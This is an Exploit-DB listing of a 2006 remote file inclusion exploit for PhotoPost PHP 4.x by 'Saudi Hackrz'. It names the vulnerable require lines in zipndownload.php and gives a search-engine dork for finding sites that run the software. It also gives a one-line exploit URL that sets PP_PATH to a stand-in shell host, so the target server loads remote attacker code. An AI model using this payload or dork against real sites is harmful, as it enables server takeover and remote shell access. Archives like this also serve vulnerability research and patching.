PhotoPost 4.6 - 'PP_PATH' Remote File Inclusion

EDB-ID:

2369

CVE:

2006-4828

EDB Verified:

Author:

Saudi Hackrz

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-09-15

Vulnerable App:

#====================================================================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0
#Fix : update To 4.7 or 4.8
#Script :)
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================================
#Bug in : zipndownload.php
#        require "$PP_PATH/languages/$pplang/showgallery.php";
#        require "$PP_PATH/login-inc.php";
#
#in <<<<  zipndownload.php & .... :)
#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI
ARABIA=============================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net  ,www.xp10.com ,www.lezr.com
==================================I LOVE SAUDI ARABIA=============================================#

# milw0rm.com [2006-09-15]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services